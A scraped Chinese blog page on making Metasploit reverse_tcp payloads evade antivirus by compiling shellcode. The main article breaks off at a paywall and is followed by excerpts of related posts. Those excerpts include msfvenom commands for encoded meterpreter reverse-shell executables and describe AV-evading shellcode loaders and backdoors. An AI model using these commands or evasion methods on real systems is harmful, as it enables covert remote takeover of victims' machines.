使用shellcode打造MSF免杀payload

最新推荐文章于 2025-03-12 10:56:18 发布
最新推荐文章于 2025-03-12 10:56:18 发布
阅读量1.9k 收藏 8
点赞数
分类专栏: 安全开发 实战篇 文章标签: 免杀exe 免杀的payload kali shellcode msf玩法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kclax/article/details/93207446
版权
本文介绍了如何利用MSF生成shellcode,并通过多种方法将其编译为免杀的Windows reverse_tcp payload。测试表明,即使使用默认编译选项,生成的exe也能有效避免杀毒软件检测,且能正常执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述
0x00 前言
经常有同学提及MSF payload的免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀的payload,那就是shellcode。
0x01 从哪里开始
shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能,接下来我们就拿最常用的payload:reverse_tcp来做测试吧!(其它的payload均可以)
CobaltStrike:payload>windows>meterpreter>reverse_tcp设置选项如下:监听9527端口。
在这里插入图片描述
接下来以同样的方式生成c格式的payload,打开payload查看:
在这里插入图片描述
没错,你看到的是shellcode,那么如何编译成我们需要的exe呢?
0x02 如何执行shellcode
经过一番搜索,大致得到了这么几种执行shellcode的方法(c语言,其它语言执行shellcode的方法可自己去寻找)
1:

最低0.47元/天 解锁文章
Kali的学习笔记篇(八)使用msf生成的shellcode制作payload
Kind&红衣的博客
08-13 6735
环境:     kali-linux-2018.2-amd.iso       Visual Studio 2017     msfvenom    更新时间:2018年8月13日07:06:43 直接注入的生成方式(一): //生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码 root@kali:~# msfvenom -p wi...
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 1125
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
shellcode丨C语言三条指令360!你还困吗?
HUYA69的博客
09-07 1902
shellcode(1)C语言三条指令360 ✉1 简介 描述有错的地方各位师傅海涵。 经过一下午的C语言测试,得出了十多种过360的·方法,这里拿三种c的方式过360(思路大体相同),还有一个c++的360和火绒都可以过等有时间都可以跟大家更新。 ✉2 过程 废话就不多讲了对于初学者友好发展,先看一遍制作过程,我们准备好msf和cs的shllecode msfvenom -p windows/meterpreter/reverse_tcp LHOST="自...
使用shellcode打造MSFpayloadshellcode加载技术
jackey3Lin的专栏
10-21 5558
0x00 前言      经常有同学提及MSF payload问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造payload,那就是shellcode。  0x01 从哪里开始      shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能,接下来我们就拿最常用的payload:reverse
黑客零基础入门之技术,一文详解基础知识分享!
最新发布
白帽阿叁的博客
03-12 1073
本文主要介绍了常见毒技术与技术的基础概念,以及一些常见技术的实现手法。技术可深可浅,刚接触并想深入学习的同学建议从汇编语言、Windows编程等基础学起。如果只作为自己众多技术点中的一环,希望拿来就能用的话,建议直接使用ShellCode加载器,简单高效,但要注意时效性噢。给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
exec语言,实验使用 C 编译 shellcode 上线
weixin_39540018的博客
05-19 678
实验了一下这篇文章里面介绍的方法:[使用 C 编译 shellcode 上线](https://www.xljtj.com/archives/c-shellcode.html?from=timeline&isappinstalled=0)。这篇文章已经把步骤写的很清楚了,但是我会在本文中也记录清楚每一步,因为文章可能说没就没,记下来自己留个备份。顺便记下我遇到的几个mini tin...
使用MSF生成的shellcode打造payload
MickeyMouse1928的博客
05-04 1万+
环境: 1.Kali攻击机IP:192.168.114.140 2.使用win7生成exe 步骤: 使用msfvenom生成shellcodemsfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c win7中使用Visual studio创建Win32控制台
基本知识,shellcode混淆
白帽子凯哥聊黑客
06-17 1892
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查技术,这也是360查能力强的原因。
通过Python实现Payload分离过程详解
09-16
虽然上述示展示了如何使用Python实现Payload的分离与,但需要注意的是这种行为涉及非法活动。本示仅用于教学目的,请不要将其应用于非法用途。 #### 五、总结 通过上述步骤,我们已经详细介绍了如何使用...
利用Shellcode注入PE文件加载计算器
威化饼的一隅
04-16 3247
文章目录简介C语言版shellcode汇编版shellcodeshellcode跳转到原入口地址代码编写思路源代码 简介 采用C语言查看和修改一些PE文件的关键结构,结合shellcode,完成功能: 先用C语言编写通过LoadLibrary()和GetProcAddress()调用msvcrt.dll中的system()函数来弹出计算器的代码。在OllyDbg中打开该程序,查看对应的汇编代码和...
MSF实战过静态:ShellCode加花指令
xf555er的博客
03-30 1333
第一部分(api_call)是一个通用API调用函数,用于动态查找和调用API。第二部分(reverse_tcp)创建一个反向TCP连接,将本地机器连接到攻击者的监听器。第三部分(recv)负责接收并执行第二阶段Payload。这三部分共同实现了一段完整的Shellcode,用于反向连接攻击者机器并执行远程指令。
(记录向)C格式shellcode异或加密生成dll,可过 Windows Defender
daxi0ng的博客
01-13 1777
1、cs生成payload.c 2、使用https://github.com/k-fire/shellcode-To-DLL 测试用(https://github.com/k-fire/shellcode-To-DLL/blob/master/Release/call_dll.exe) 3、按照工具的操作方法生成dll文件。 4、将dll文件转化为exe。 先保存为bat,然后在转换为exe。 ...
vc++木马源码一些常用方法
weixin_30877755的博客
05-04 712
1.字符串连接 ////////////////////////////////////////////////////////////把字符串"canxin"连接起来(字符串连接法) char *str1="can", *str2="xin",*str3=NULL; str3=new char[strlen(str1)+strlen(str2)+1]; strcpy(str3,str...
msf生成linux shellcode,MSF-Shellcode生成和使用
weixin_33344952的博客
05-13 663
1使用環境Kali 2.0msfvenom2Msfvenom參數說明msfvenom �Ch 查看幫助說明:Options:-p, --payload 指定需要使用payload(攻擊荷載)。如果需要使用自定義的payload,請使用'-'或者stdin指定-l, --list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: ...
shellcode之360安全卫士(shecodject)(一)
ZPFCD的博客
07-16 955
shellcode
java 加载shellcode_多阶段加载shellcode
weixin_31759829的博客
02-26 497
介绍多阶段加载是基于如下这种想法:如果一个小片段的shellcode可以在目标上执行,理论上可以通过网络连接、传输和执行其他的shellcode,或者甚至是一个完整的二进制可执行文件。关键的想法是对加载的最终程序进行分级。这子,只有严格大小的代码会在第一阶段加载。这种想法在一篇优秀的文章<>中有详细介绍。第一阶段:shellcode加载这是在加载链中至关重要的一步。代码必须够小,没有...
C/C++ 远程ShellCode执行工具
热门推荐
优快云
07-21 1万+
通过开发一组远程代码执行盒,可以动态实现对ShellCode代码的动态载入,由于ShellCode不存放在本地客户端常量区,所以在一定程度上可以减少被概率,客户端只保留之基本的Socket通信功能,当需要时才会加载恶意代码运行。此工具分为服务端与客户端,客户端可以将其加入到开机自启动列表,并传入响应的参数即可,目前支持TCP/UDP/HTTP三种协议传输,后期可能会增加ICMP等来实现后门的传输工作。
java 加载shellcode_通用Shellcode加载器
weixin_35780426的博客
02-26 1036
Shellcode加载器是一种基本的规避技术。尽管shellcode加载器通常可以促进payload的初始执行,但是启发式检测方法仍可以标记payload的其他方面和行为。如,很多安全产品可能会在内存中时对其进行检测,或者将特定的网络流量检测为恶意。我们将研究一些适合与加载器结合使用的后期开发框架,并研究如何嵌入其他类型的二进制文件(如.NET和已编译的PE二进制文件)。博客系列的第一部分将介...
shellCode技巧
qq_39330735的博客
05-15 2887
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对毒软件的⼀种⽅法,但是由于与⼿法的定义 有出⼊,所以如果将国内技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视 ,在类似于技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论技术,这为以后⽊⻢ 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
C/C++加载shellcode技术解析与VT率分析
"这篇文章是Tide安全团队关于C和C++加载shellcode技术的专题,主要讨论如何在安全的环境下使用这些技术进行学习和交流。文章提到了团队的多个安全研究方向,并分享了他们自主研发的安全平台。此外,文章还提供了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值